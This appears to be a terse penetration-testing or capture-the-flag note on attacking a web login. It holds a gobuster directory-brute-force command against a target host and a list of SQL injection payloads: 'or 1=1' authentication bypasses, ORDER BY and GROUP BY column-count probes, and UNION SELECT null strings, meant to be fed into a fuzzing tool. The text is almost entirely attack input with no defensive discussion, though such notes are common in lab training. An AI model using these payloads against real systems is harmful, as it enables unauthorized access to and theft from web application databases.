gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Browser
Username: 1' or '1'='1'-- -
Password: 1' or '1'='1'-- -
Option #1
Used this page to collect possible injections
List
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 4--+
1' GROUP BY 1--+
1' GROUP BY 2--+
1' GROUP BY 3--+
1' GROUP BY 4--+
1' UNION SELECT null-- -
1' UNION SELECT null,null-- -
1' UNION SELECT null,null,null-- -
Add list above as payload in position 1 and 2
Browser
Username: 1' UNION SELECT null-- -
Password: 1' GROUP BY 2--+
